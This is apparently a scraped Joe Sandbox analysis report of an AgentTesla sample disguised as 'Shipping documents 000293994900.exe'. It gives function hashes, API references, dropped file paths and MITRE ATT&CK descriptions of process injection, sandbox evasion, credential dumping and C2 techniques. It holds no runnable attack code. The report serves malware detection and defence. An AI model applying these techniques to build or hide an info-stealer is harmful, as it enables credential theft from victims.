Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54

Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48

Function 388D88B0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LR]q, xrefs: 388D89F2
$]q, xrefs: 388D892F
LR]q, xrefs: 388D89A3
$]q, xrefs: 388D893B

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$$]q$$]q
API String ID: 0-3527005858
Opcode ID: a0144eb6e7eccb8406328a237c27ac798ce638cb4b10364c43b0fc13c64ea3ad
Instruction ID: 4c8b7ca3be0ec755728df2a9570908d161f968954dd8eb3b0c933f124f2162e2
Opcode Fuzzy Hash: a0144eb6e7eccb8406328a237c27ac798ce638cb4b10364c43b0fc13c64ea3ad
Instruction Fuzzy Hash: 2C51B0347002059FDB18DF28C990A6AB7E6FF88304F148969E915EB3A5DB30EC46CB95

Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44

Function 388DAD92 Relevance: 5.2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

Strings

$]q, xrefs: 388DAF3B
$]q, xrefs: 388DAF0C
$]q, xrefs: 388DAF64
$]q, xrefs: 388DAEB9

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 4c340ba6cf3d994120f4e89b45b0b08557a0388bc38595921a5b3a5e62dafdfa
Instruction ID: 74bd737efa16eebfae9384fdac6228f00eb02c802d4ec0b59b7221655fd8bdb5
Opcode Fuzzy Hash: 4c340ba6cf3d994120f4e89b45b0b08557a0388bc38595921a5b3a5e62dafdfa
Instruction Fuzzy Hash: 5E518E74A00204CFDB15EB68D980ADEB3B6EF88350F708969E815E7755DB35EC4ACB81

Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

Memory Dump Source

Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Shipping documents 000293994900.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Settings.ini

C:\Users\user\AppData\Local\Temp\nsj89C.tmp

C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll

C:\Users\user\Uploadable\normallnnens\660.jpg

C:\Users\user\Uploadable\normallnnens\Editere.ter

C:\Users\user\Uploadable\normallnnens\Gaberloonie.Pla73

C:\Users\user\Uploadable\normallnnens\Wodewose235.enc

C:\Users\user\Uploadable\normallnnens\dharma.txt

C:\Users\user\Uploadable\normallnnens\shears.sip

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
Shipping documents 000293994900.exe

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Function 004052D1 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405F0A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403C55 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Function 10001771 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
fileCOMMON

Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre